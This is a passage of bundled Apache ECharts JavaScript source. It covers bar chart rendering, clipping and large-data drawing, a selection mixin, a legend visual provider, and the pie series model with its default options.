bgEl;\n\n                    var shape = createBackgroundShape(isHorizontalOrRadial, layout, coord);\n                    updateProps(bgEl, { shape: shape }, animationModel, newIndex);\n                }\n\n                var el = oldData.getItemGraphicEl(oldIndex);\n                if (!data.hasValue(newIndex)) {\n                    group.remove(el);\n                    return;\n                }\n\n                if (needsClip) {\n                    var isClipped = clip[coord.type](coordSysClipArea, layout);\n                    if (isClipped) {\n                        group.remove(el);\n                        return;\n                    }\n                }\n\n                if (el) {\n                    updateProps(el, {shape: layout}, animationModel, newIndex);\n                }\n                else {\n                    el = elementCreator[coord.type](\n                        newIndex, layout, isHorizontalOrRadial, animationModel, true, roundCap\n                    );\n                }\n\n                data.setItemGraphicEl(newIndex, el);\n                // Add back\n                group.add(el);\n\n                updateStyle(\n                    el, data, newIndex, itemModel, layout,\n                    seriesModel, isHorizontalOrRadial, coord.type === 'polar'\n                );\n            })\n            .remove(function (dataIndex) {\n                var el = oldData.getItemGraphicEl(dataIndex);\n                if (coord.type === 'cartesian2d') {\n                    el && removeRect(dataIndex, animationModel, el);\n                }\n                else {\n                    el && removeSector(dataIndex, animationModel, el);\n                }\n            })\n            .execute();\n\n        var bgGroup = this._backgroundGroup || (this._backgroundGroup = new Group());\n        bgGroup.removeAll();\n\n        for (var i = 0; i < bgEls.length; ++i) {\n            bgGroup.add(bgEls[i]);\n        }\n        group.add(bgGroup);\n        this._backgroundEls = bgEls;\n\n        this._data = data;\n    },\n\n    _renderLarge: function (seriesModel, ecModel, api) {\n        this._clear();\n        createLarge(seriesModel, this.group);\n\n        // Use clipPath in large mode.\n        var clipPath = seriesModel.get('clip', true)\n            ? createClipPath(seriesModel.coordinateSystem, false, seriesModel)\n            : null;\n        if (clipPath) {\n            this.group.setClipPath(clipPath);\n        }\n        else {\n            this.group.removeClipPath();\n        }\n    },\n\n    _incrementalRenderLarge: function (params, seriesModel) {\n        this._removeBackground();\n        createLarge(seriesModel, this.group, true);\n    },\n\n    dispose: noop,\n\n    remove: function (ecModel) {\n        this._clear(ecModel);\n    },\n\n    _clear: function (ecModel) {\n        var group = this.group;\n        var data = this._data;\n        if (ecModel && ecModel.get('animation') && data && !this._isLargeDraw) {\n            this._removeBackground();\n            this._backgroundEls = [];\n\n            data.eachItemGraphicEl(function (el) {\n                if (el.type === 'sector') {\n                    removeSector(el.dataIndex, ecModel, el);\n                }\n                else {\n                    removeRect(el.dataIndex, ecModel, el);\n                }\n            });\n        }\n        else {\n            group.removeAll();\n        }\n        this._data = null;\n    },\n\n    _removeBackground: function () {\n        this.group.remove(this._backgroundGroup);\n        this._backgroundGroup = null;\n    }\n\n});\n\nvar mathMax$4 = Math.max;\nvar mathMin$4 = Math.min;\n\nvar clip = {\n    cartesian2d: function (coordSysBoundingRect, layout) {\n        var signWidth = layout.width < 0 ? -1 : 1;\n        var signHeight = layout.height < 0 ? -1 : 1;\n        // Needs positive width and height\n        if (signWidth < 0) {\n            layout.x += layout.width;\n            layout.width = -layout.width;\n        }\n        if (signHeight < 0) {\n            layout.y += layout.height;\n            layout.height = -layout.height;\n        }\n\n        var x = mathMax$4(layout.x, coordSysBoundingRect.x);\n        var x2 = mathMin$4(layout.x + layout.width, coordSysBoundingRect.x + coordSysBoundingRect.width);\n        var y = mathMax$4(layout.y, coordSysBoundingRect.y);\n        var y2 = mathMin$4(layout.y + layout.height, coordSysBoundingRect.y + coordSysBoundingRect.height);\n\n        layout.x = x;\n        layout.y = y;\n        layout.width = x2 - x;\n        layout.height = y2 - y;\n\n        var clipped = layout.width < 0 || layout.height < 0;\n\n        // Reverse back\n        if (signWidth < 0) {\n            layout.x += layout.width;\n            layout.width = -layout.width;\n        }\n        if (signHeight < 0) {\n            layout.y += layout.height;\n            layout.height = -layout.height;\n        }\n\n        return clipped;\n    },\n\n    polar: function (coordSysClipArea) {\n        return false;\n    }\n};\n\nvar elementCreator = {\n\n    cartesian2d: function (\n        dataIndex, layout, isHorizontal,\n        animationModel, isUpdate\n    ) {\n        var rect = new Rect({\n            shape: extend({}, layout),\n            z2: 1\n        });\n\n        rect.name = 'item';\n\n        // Animation\n        if (animationModel) {\n            var rectShape = rect.shape;\n            var animateProperty = isHorizontal ? 'height' : 'width';\n            var animateTarget = {};\n            rectShape[animateProperty] = 0;\n            animateTarget[animateProperty] = layout[animateProperty];\n            graphic[isUpdate ? 'updateProps' : 'initProps'](rect, {\n                shape: animateTarget\n            }, animationModel, dataIndex);\n        }\n\n        return rect;\n    },\n\n    polar: function (\n        dataIndex, layout, isRadial,\n        animationModel, isUpdate, roundCap\n    ) {\n        // Keep the same logic with bar in catesion: use end value to control\n        // direction. Notice that if clockwise is true (by default), the sector\n        // will always draw clockwisely, no matter whether endAngle is greater\n        // or less than startAngle.\n        var clockwise = layout.startAngle < layout.endAngle;\n\n        var ShapeClass = (!isRadial && roundCap) ? Sausage : Sector;\n\n        var sector = new ShapeClass({\n            shape: defaults({clockwise: clockwise}, layout),\n            z2: 1\n        });\n\n        sector.name = 'item';\n\n        // Animation\n        if (animationModel) {\n            var sectorShape = sector.shape;\n            var animateProperty = isRadial ? 'r' : 'endAngle';\n            var animateTarget = {};\n            sectorShape[animateProperty] = isRadial ? 0 : layout.startAngle;\n            animateTarget[animateProperty] = layout[animateProperty];\n            graphic[isUpdate ? 'updateProps' : 'initProps'](sector, {\n                shape: animateTarget\n            }, animationModel, dataIndex);\n        }\n\n        return sector;\n    }\n};\n\nfunction removeRect(dataIndex, animationModel, el) {\n    // Not show text when animating\n    el.style.text = null;\n    updateProps(el, {\n        shape: {\n            width: 0\n        }\n    }, animationModel, dataIndex, function () {\n        el.parent && el.parent.remove(el);\n    });\n}\n\nfunction removeSector(dataIndex, animationModel, el) {\n    // Not show text when animating\n    el.style.text = null;\n    updateProps(el, {\n        shape: {\n            r: el.shape.r0\n        }\n    }, animationModel, dataIndex, function () {\n        el.parent && el.parent.remove(el);\n    });\n}\n\nvar getLayout = {\n    cartesian2d: function (data, dataIndex, itemModel) {\n        var layout = data.getItemLayout(dataIndex);\n        var fixedLineWidth = getLineWidth(itemModel, layout);\n\n        // fix layout with lineWidth\n        var signX = layout.width > 0 ? 1 : -1;\n        var signY = layout.height > 0 ? 1 : -1;\n        return {\n            x: layout.x + signX * fixedLineWidth / 2,\n            y: layout.y + signY * fixedLineWidth / 2,\n            width: layout.width - signX * fixedLineWidth,\n            height: layout.height - signY * fixedLineWidth\n        };\n    },\n\n    polar: function (data, dataIndex, itemModel) {\n        var layout = data.getItemLayout(dataIndex);\n        return {\n            cx: layout.cx,\n            cy: layout.cy,\n            r0: layout.r0,\n            r: layout.r,\n            startAngle: layout.startAngle,\n            endAngle: layout.endAngle\n        };\n    }\n};\n\nfunction isZeroOnPolar(layout) {\n    return layout.startAngle != null\n        && layout.endAngle != null\n        && layout.startAngle === layout.endAngle;\n}\n\nfunction updateStyle(\n    el, data, dataIndex, itemModel, layout, seriesModel, isHorizontal, isPolar\n) {\n    var color = data.getItemVisual(dataIndex, 'color');\n    var opacity = data.getItemVisual(dataIndex, 'opacity');\n    var stroke = data.getVisual('borderColor');\n    var itemStyleModel = itemModel.getModel('itemStyle');\n    var hoverStyle = itemModel.getModel('emphasis.itemStyle').getBarItemStyle();\n\n    if (!isPolar) {\n        el.setShape('r', itemStyleModel.get('barBorderRadius') || 0);\n    }\n\n    el.useStyle(defaults(\n        {\n            stroke: isZeroOnPolar(layout) ? 'none' : stroke,\n            fill: isZeroOnPolar(layout) ? 'none' : color,\n            opacity: opacity\n        },\n        itemStyleModel.getBarItemStyle()\n    ));\n\n    var cursorStyle = itemModel.getShallow('cursor');\n    cursorStyle && el.attr('cursor', cursorStyle);\n\n    var labelPositionOutside = isHorizontal\n        ? (layout.height > 0 ? 'bottom' : 'top')\n        : (layout.width > 0 ? 'left' : 'right');\n\n    if (!isPolar) {\n        setLabel(\n            el.style, hoverStyle, itemModel, color,\n            seriesModel, dataIndex, labelPositionOutside\n        );\n    }\n    if (isZeroOnPolar(layout)) {\n        hoverStyle.fill = hoverStyle.stroke = 'none';\n    }\n    setHoverStyle(el, hoverStyle);\n}\n\n// In case width or height are too small.\nfunction getLineWidth(itemModel, rawLayout) {\n    var lineWidth = itemModel.get(BAR_BORDER_WIDTH_QUERY) || 0;\n    // width or height may be NaN for empty data\n    var width = isNaN(rawLayout.width) ? Number.MAX_VALUE : Math.abs(rawLayout.width);\n    var height = isNaN(rawLayout.height) ? Number.MAX_VALUE : Math.abs(rawLayout.height);\n    return Math.min(lineWidth, width, height);\n}\n\n\nvar LargePath = Path.extend({\n\n    type: 'largeBar',\n\n    shape: {points: []},\n\n    buildPath: function (ctx, shape) {\n        // Drawing lines is more efficient than drawing\n        // a whole line or drawing rects.\n        var points = shape.points;\n        var startPoint = this.__startPoint;\n        var baseDimIdx = this.__baseDimIdx;\n\n        for (var i = 0; i < points.length; i += 2) {\n            startPoint[baseDimIdx] = points[i + baseDimIdx];\n            ctx.moveTo(startPoint[0], startPoint[1]);\n            ctx.lineTo(points[i], points[i + 1]);\n        }\n    }\n});\n\nfunction createLarge(seriesModel, group, incremental) {\n    // TODO support polar\n    var data = seriesModel.getData();\n    var startPoint = [];\n    var baseDimIdx = data.getLayout('valueAxisHorizontal') ? 1 : 0;\n    startPoint[1 - baseDimIdx] = data.getLayout('valueAxisStart');\n\n    var largeDataIndices = data.getLayout('largeDataIndices');\n    var barWidth = data.getLayout('barWidth');\n\n    var backgroundModel = seriesModel.getModel('backgroundStyle');\n    var drawBackground = seriesModel.get('showBackground', true);\n\n    if (drawBackground) {\n        var points = data.getLayout('largeBackgroundPoints');\n        var backgroundStartPoint = [];\n        backgroundStartPoint[1 - baseDimIdx] = data.getLayout('backgroundStart');\n\n        var bgEl = new LargePath({\n            shape: {points: points},\n            incremental: !!incremental,\n            __startPoint: backgroundStartPoint,\n            __baseDimIdx: baseDimIdx,\n            __largeDataIndices: largeDataIndices,\n            __barWidth: barWidth,\n            silent: true,\n            z2: 0\n        });\n        setLargeBackgroundStyle(bgEl, backgroundModel, data);\n        group.add(bgEl);\n    }\n\n    var el = new LargePath({\n        shape: {points: data.getLayout('largePoints')},\n        incremental: !!incremental,\n        __startPoint: startPoint,\n        __baseDimIdx: baseDimIdx,\n        __largeDataIndices: largeDataIndices,\n        __barWidth: barWidth\n    });\n    group.add(el);\n    setLargeStyle(el, seriesModel, data);\n\n    // Enable tooltip and user mouse/touch event handlers.\n    el.seriesIndex = seriesModel.seriesIndex;\n\n    if (!seriesModel.get('silent')) {\n        el.on('mousedown', largePathUpdateDataIndex);\n        el.on('mousemove', largePathUpdateDataIndex);\n    }\n}\n\n// Use throttle to avoid frequently traverse to find dataIndex.\nvar largePathUpdateDataIndex = throttle(function (event) {\n    var largePath = this;\n    var dataIndex = largePathFindDataIndex(largePath, event.offsetX, event.offsetY);\n    largePath.dataIndex = dataIndex >= 0 ? dataIndex : null;\n}, 30, false);\n\nfunction largePathFindDataIndex(largePath, x, y) {\n    var baseDimIdx = largePath.__baseDimIdx;\n    var valueDimIdx = 1 - baseDimIdx;\n    var points = largePath.shape.points;\n    var largeDataIndices = largePath.__largeDataIndices;\n    var barWidthHalf = Math.abs(largePath.__barWidth / 2);\n    var startValueVal = largePath.__startPoint[valueDimIdx];\n\n    _eventPos[0] = x;\n    _eventPos[1] = y;\n    var pointerBaseVal = _eventPos[baseDimIdx];\n    var pointerValueVal = _eventPos[1 - baseDimIdx];\n    var baseLowerBound = pointerBaseVal - barWidthHalf;\n    var baseUpperBound = pointerBaseVal + barWidthHalf;\n\n    for (var i = 0, len = points.length / 2; i < len; i++) {\n        var ii = i * 2;\n        var barBaseVal = points[ii + baseDimIdx];\n        var barValueVal = points[ii + valueDimIdx];\n        if (\n            barBaseVal >= baseLowerBound && barBaseVal <= baseUpperBound\n            && (\n                startValueVal <= barValueVal\n                    ? (pointerValueVal >= startValueVal && pointerValueVal <= barValueVal)\n                    : (pointerValueVal >= barValueVal && pointerValueVal <= startValueVal)\n            )\n        ) {\n            return largeDataIndices[i];\n        }\n    }\n\n    return -1;\n}\n\nfunction setLargeStyle(el, seriesModel, data) {\n    var borderColor = data.getVisual('borderColor') || data.getVisual('color');\n    var itemStyle = seriesModel.getModel('itemStyle').getItemStyle(['color', 'borderColor']);\n\n    el.useStyle(itemStyle);\n    el.style.fill = null;\n    el.style.stroke = borderColor;\n    el.style.lineWidth = data.getLayout('barWidth');\n}\n\nfunction setLargeBackgroundStyle(el, backgroundModel, data) {\n    var borderColor = backgroundModel.get('borderColor') || backgroundModel.get('color');\n    var itemStyle = backgroundModel.getItemStyle(['color', 'borderColor']);\n\n    el.useStyle(itemStyle);\n    el.style.fill = null;\n    el.style.stroke = borderColor;\n    el.style.lineWidth = data.getLayout('barWidth');\n}\n\nfunction createBackgroundShape(isHorizontalOrRadial, layout, coord) {\n    var coordLayout;\n    var isPolar = coord.type === 'polar';\n    if (isPolar) {\n        coordLayout = coord.getArea();\n    }\n    else {\n        coordLayout = coord.grid.getRect();\n    }\n\n    if (isPolar) {\n        return {\n            cx: coordLayout.cx,\n            cy: coordLayout.cy,\n            r0: isHorizontalOrRadial ? coordLayout.r0 : layout.r0,\n            r: isHorizontalOrRadial ? coordLayout.r : layout.r,\n            startAngle: isHorizontalOrRadial ? layout.startAngle : 0,\n            endAngle: isHorizontalOrRadial ? layout.endAngle : Math.PI * 2\n        };\n    }\n    else {\n        return {\n            x: isHorizontalOrRadial ? layout.x : coordLayout.x,\n            y: isHorizontalOrRadial ? coordLayout.y : layout.y,\n            width: isHorizontalOrRadial ? layout.width : coordLayout.width,\n            height: isHorizontalOrRadial ? coordLayout.height : layout.height\n        };\n    }\n}\n\nfunction createBackgroundEl(coord, isHorizontalOrRadial, layout) {\n    var ElementClz = coord.type === 'polar' ? Sector : Rect;\n    return new ElementClz({\n        shape: createBackgroundShape(isHorizontalOrRadial, layout, coord),\n        silent: true,\n        z2: 0\n    });\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// In case developer forget to include grid component\nregisterLayout(PRIORITY.VISUAL.LAYOUT, curry(layout, 'bar'));\n// Use higher prority to avoid to be blocked by other overall layout, which do not\n// only exist in this module, but probably also exist in other modules, like `barPolar`.\nregisterLayout(PRIORITY.VISUAL.PROGRESSIVE_LAYOUT, largeLayout);\n\nregisterVisual({\n    seriesType: 'bar',\n    reset: function (seriesModel) {\n        // Visual coding for legend\n        seriesModel.getData().setVisual('legendSymbol', 'roundRect');\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n\n/**\n * [Usage]:\n * (1)\n * createListSimply(seriesModel, ['value']);\n * (2)\n * createListSimply(seriesModel, {\n *     coordDimensions: ['value'],\n *     dimensionsCount: 5\n * });\n *\n * @param {module:echarts/model/Series} seriesModel\n * @param {Object|Array.<string|Object>} opt opt or coordDimensions\n *        The options in opt, see `echarts/data/helper/createDimensions`\n * @param {Array.<string>} [nameList]\n * @return {module:echarts/data/List}\n */\nvar createListSimply = function (seriesModel, opt, nameList) {\n    opt = isArray(opt) && {coordDimensions: opt} || extend({}, opt);\n\n    var source = seriesModel.getSource();\n\n    var dimensionsInfo = createDimensions(source, opt);\n\n    var list = new List(dimensionsInfo, seriesModel);\n    list.initData(source, nameList);\n\n    return list;\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * Data selectable mixin for chart series.\n * To eanble data select, option of series must have `selectedMode`.\n * And each data item will use `selected` to toggle itself selected status\n */\n\nvar selectableMixin = {\n\n    /**\n     * @param {Array.<Object>} targetList [{name, value, selected}, ...]\n     *        If targetList is an array, it should like [{name: ..., value: ...}, ...].\n     *        If targetList is a \"List\", it must have coordDim: 'value' dimension and name.\n     */\n    updateSelectedMap: function (targetList) {\n        this._targetList = isArray(targetList) ? targetList.slice() : [];\n\n        this._selectTargetMap = reduce(targetList || [], function (targetMap, target) {\n            targetMap.set(target.name, target);\n            return targetMap;\n        }, createHashMap());\n    },\n\n    /**\n     * Either name or id should be passed as input here.\n     * If both of them are defined, id is used.\n     *\n     * @param {string|undefined} name name of data\n     * @param {number|undefined} id dataIndex of data\n     */\n    // PENGING If selectedMode is null ?\n    select: function (name, id) {\n        var target = id != null\n            ? this._targetList[id]\n            : this._selectTargetMap.get(name);\n        var selectedMode = this.get('selectedMode');\n        if (selectedMode === 'single') {\n            this._selectTargetMap.each(function (target) {\n                target.selected = false;\n            });\n        }\n        target && (target.selected = true);\n    },\n\n    /**\n     * Either name or id should be passed as input here.\n     * If both of them are defined, id is used.\n     *\n     * @param {string|undefined} name name of data\n     * @param {number|undefined} id dataIndex of data\n     */\n    unSelect: function (name, id) {\n        var target = id != null\n            ? this._targetList[id]\n            : this._selectTargetMap.get(name);\n        // var selectedMode = this.get('selectedMode');\n        // selectedMode !== 'single' && target && (target.selected = false);\n        target && (target.selected = false);\n    },\n\n    /**\n     * Either name or id should be passed as input here.\n     * If both of them are defined, id is used.\n     *\n     * @param {string|undefined} name name of data\n     * @param {number|undefined} id dataIndex of data\n     */\n    toggleSelected: function (name, id) {\n        var target = id != null\n            ? this._targetList[id]\n            : this._selectTargetMap.get(name);\n        if (target != null) {\n            this[target.selected ? 'unSelect' : 'select'](name, id);\n            return target.selected;\n        }\n    },\n\n    /**\n     * Either name or id should be passed as input here.\n     * If both of them are defined, id is used.\n     *\n     * @param {string|undefined} name name of data\n     * @param {number|undefined} id dataIndex of data\n     */\n    isSelected: function (name, id) {\n        var target = id != null\n            ? this._targetList[id]\n            : this._selectTargetMap.get(name);\n        return target && target.selected;\n    }\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n\n/**\n * LegendVisualProvider is an bridge that pick encoded color from data and\n * provide to the legend component.\n * @param {Function} getDataWithEncodedVisual Function to get data after filtered. It stores all the encoding info\n * @param {Function} getRawData Function to get raw data before filtered.\n */\nfunction LegendVisualProvider(getDataWithEncodedVisual, getRawData) {\n    this.getAllNames = function () {\n        var rawData = getRawData();\n        // We find the name from the raw data. In case it's filtered by the legend component.\n        // Normally, the name can be found in rawData, but can't be found in filtered data will display as gray.\n        return rawData.mapArray(rawData.getName);\n    };\n\n    this.containName = function (name) {\n        var rawData = getRawData();\n        return rawData.indexOfName(name) >= 0;\n    };\n\n    this.indexOfName = function (name) {\n        // Only get data when necessary.\n        // Because LegendVisualProvider constructor may be new in the stage that data is not prepared yet.\n        // Invoking Series#getData immediately will throw an error.\n        var dataWithEncodedVisual = getDataWithEncodedVisual();\n        return dataWithEncodedVisual.indexOfName(name);\n    };\n\n    this.getItemVisual = function (dataIndex, key) {\n        // Get encoded visual properties from final filtered data.\n        var dataWithEncodedVisual = getDataWithEncodedVisual();\n        return dataWithEncodedVisual.getItemVisual(dataIndex, key);\n    };\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar PieSeries = extendSeriesModel({\n\n    type: 'series.pie',\n\n    // Overwrite\n    init: function (option) {\n        PieSeries.superApply(this, 'init', arguments);\n\n        // Enable legend selection for each data item\n        // Use a function instead of direct access because data reference may changed\n        this.legendVisualProvider = new LegendVisualProvider(\n            bind(this.getData, this), bind(this.getRawData, this)\n        );\n\n        this.updateSelectedMap(this._createSelectableList());\n\n        this._defaultLabelLine(option);\n    },\n\n    // Overwrite\n    mergeOption: function (newOption) {\n        PieSeries.superCall(this, 'mergeOption', newOption);\n\n        this.updateSelectedMap(this._createSelectableList());\n    },\n\n    getInitialData: function (option, ecModel) {\n        return createListSimply(this, {\n            coordDimensions: ['value'],\n            encodeDefaulter: curry(makeSeriesEncodeForNameBased, this)\n        });\n    },\n\n    _createSelectableList: function () {\n        var data = this.getRawData();\n        var valueDim = data.mapDimension('value');\n        var targetList = [];\n        for (var i = 0, len = data.count(); i < len; i++) {\n            targetList.push({\n                name: data.getName(i),\n                value: data.get(valueDim, i),\n                selected: retrieveRawAttr(data, i, 'selected')\n            });\n        }\n        return targetList;\n    },\n\n    // Overwrite\n    getDataParams: function (dataIndex) {\n        var data = this.getData();\n        var params = PieSeries.superCall(this, 'getDataParams', dataIndex);\n        // FIXME toFixed?\n\n        var valueList = [];\n        data.each(data.mapDimension('value'), function (value) {\n            valueList.push(value);\n        });\n\n        params.percent = getPercentWithPrecision(\n            valueList,\n            dataIndex,\n            data.hostModel.get('percentPrecision')\n        );\n\n        params.$vars.push('percent');\n        return params;\n    },\n\n    _defaultLabelLine: function (option) {\n        // Extend labelLine emphasis\n        defaultEmphasis(option, 'labelLine', ['show']);\n\n        var labelLineNormalOpt = option.labelLine;\n        var labelLineEmphasisOpt = option.emphasis.labelLine;\n        // Not show label line if `label.normal.show = false`\n        labelLineNormalOpt.show = labelLineNormalOpt.show\n            && option.label.show;\n        labelLineEmphasisOpt.show = labelLineEmphasisOpt.show\n            && option.emphasis.label.show;\n    },\n\n    defaultOption: {\n        zlevel: 0,\n        z: 2,\n        legendHoverLink: true,\n\n        hoverAnimation: true,\n        // 默认全局居中\n        center: ['50%', '50%'],\n        radius: [0, '75%'],\n        // 默认顺时针\n        clockwise: true,\n        startAngle: 90,\n        // 最小角度改为0\n        minAngle: 0,\n\n        // If the angle of a sector less than `minShowLabelAngle`,\n        // the label will not be displayed.\n        minShowLabelAngle: 0,\n\n        // 选中时扇区偏移量\n        selectedOffset: 10,\n        // 高亮扇区偏移量\n        hoverOffset: 10,\n\n        // If use strategy to avoid label overlapping\n        avoidLabelOverlap: true,\n        // 选择模式，默认关闭，可选single，multiple\n        // selectedMode: false,\n        // 南丁格尔玫瑰图模式，'radius'（半径） | 'area'（面积）\n        // roseType: null,\n\n        percentPrecision: 2,\n\n        // If still show when all data zero.\n        stillShowZeroSum: true,\n\n        // cursor: null,\n\n        left: 0,\n        top: 0,\n        right: 0,\n        bottom: 0,\n        width: null,\n        height: null,\n\n        label: {\n            // If rotate around circle\n            rotate: false,\n            show: true,\n            // 'outer', 'inside', 'center'\n            position: 'outer',\n            // 'none', 'labelLine', 'edge'. Works only when position is 'outer'\n            alignTo: 'none',\n            // Closest distance between label and chart edge.\n            // Works only position is 'outer' and alignTo is 'edge'.\n            margin: '25%',\n            // Works only position is 'outer' and alignTo is not 'edge'.\n            bleedMargin: 10,\n            // Distance between text and label line.\n            distanceToLabelLine: 5\n            // formatter: 标签文本格式器，同Tooltip.formatter，不支持异步回调\n            // 默认使用全局文本样式，详见TEXTSTYLE\n            // distance: 当position为inner时有效，为label位置到圆心的距离与圆半径(环状图为内外半径和)的比例系数\n        },\n        // Enabled when label.normal.position is 'outer'\n        labelLine: {\n            show: true,\n            // 引导线两段中的第一段长度\n            length: 15,\n            // 引导线两段中的第二段长度\n            length2: 15,\n            smooth: false,\n            lineStyle: {\n                // color: 各异,\n                width: 1,\n                type: 'solid'\n            }\n        },\n        itemStyle: {\n            borderWidth: 1\n        },\n\n        // Animation type. Valid values: expansion, scale\n        animationType: 'expansion',\n\n        // Animation type when update. Valid values: transition, expansion\n        animationTypeUpdate: 'transition',\n\n        animationEasing: 'cubicOut'\n    }\n});\n\nmixin(PieSeries, selectableMixin);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * @param {module:echarts/model/Series} seriesModel\n * @param {boolean} hasAnimation\n * @inner\n */\nfunction updateDataSelected(uid, seriesModel, hasAnimation, api) {\n    var data = seriesModel.getData();\n    var dataIndex = this.dataIndex;\n    var name = data.getName(dataIndex);\n    var selectedOffset = seriesModel.get('selectedOffset');\n\n    api.dispatchAction({\n        type: 'pieToggleSelect',\n        from: uid,\n        name: name,\n        seriesId: seriesModel.id\n    });\n\n    data.each(function (idx) {\n        toggleItemSelected(\n            data.getItemGraphicEl(idx),\n            data.getItemLayout(idx),\n            seriesModel.isSelected(data.getName(idx)),\n            selectedOffset,\n            hasAnimation\n        );\n    });\n}\n\n/**\n * @param {module:zrender/graphic/Sector} el\n * @param {Object} layout\n * @param {boolean} isSelected\n * @param {number} selectedOffset\n * @param {boolean} hasAnimation\n * @inner\n */\nfunction toggleItemSelected(el, layout, isSelected, selectedOffset, hasAnimation) {\n    var midAngle = (layout.startAngle + layout.endAngle) / 2;\n\n    var dx = Math.cos(midAngle);\n    var dy = Math.sin(midAngle);\n\n    var offset = isSelected ? selectedOffset : 0;\n    var position = [dx * offset, dy * offset];\n\n    hasAnimation\n        // animateTo will stop revious animation like update transition\n        ? el.animate()\n            .when(200, {\n                position: position\n            })\n            .start('bounceOut')\n        : el.attr('position', position);\n}\n\n/**\n * Piece of pie including Sector, Label, LabelLine\n * @constructor\n * @extends {module:zrender/graphic/Group}\n */\nfunction PiePiece(data, idx) {\n\n    Group.call(this);\n\n    var sector = new Sector({\n        z2: 2\n    });\n    var polyline = new Polyline();\n    var text = new Text();\n    this.add(sector);\n    this.add(polyline);\n    this.add(text);\n\n    this.updateData(data, idx, true);\n}\n\nvar piePieceProto = PiePiece.prototype;\n\npiePieceProto.updateData = function (data, idx, firstCreate) {\n\n    var sector = this.childAt(0);\n    var labelLine = this.childAt(1);\n    var labelText = this.childAt(2);\n\n    var seriesModel = data.hostModel;\n    var itemModel = data.getItemModel(idx);\n    var layout = data.getItemLayout(idx);\n    var sectorShape = extend({}, layout);\n    sectorShape.label = null;\n\n    var animationTypeUpdate = seriesModel.getShallow('animationTypeUpdate');\n\n    if (firstCreate) {\n        sector.setShape(sectorShape);\n\n        var animationType = seriesModel.getShallow('animationType');\n        if (animationType === 'scale') {\n            sector.shape.r = layout.r0;\n            initProps(sector, {\n                shape: {\n                    r: layout.r\n                }\n            }, seriesModel, idx);\n        }\n        // Expansion\n        else {\n            sector.shape.endAngle = layout.startAngle;\n            updateProps(sector, {\n                shape: {\n                    endAngle: layout.endAngle\n                }\n            }, seriesModel, idx);\n        }\n\n    }\n    else {\n        if (animationTypeUpdate === 'expansion') {\n            // Sectors are set to be target shape and an overlaying clipPath is used for animation\n            sector.setShape(sectorShape);\n        }\n        else {\n            // Transition animation from the old shape\n            updateProps(sector, {\n                shape: sectorShape\n            }, seriesModel, idx);\n        }\n    }\n\n    // Update common style\n    var visualColor = data.getItemVisual(idx, 'color');\n\n    sector.useStyle(\n        defaults(\n            {\n                lineJoin: 'bevel',\n                fill: visualColor\n            },\n            itemModel.getModel('itemStyle').getItemStyle()\n        )\n    );\n    sector.hoverStyle = itemModel.getModel('emphasis.itemStyle').getItemStyle();\n\n    var cursorStyle = itemModel.getShallow('cursor');\n    cursorStyle && sector.attr('cursor', cursorStyle);\n\n    // Toggle 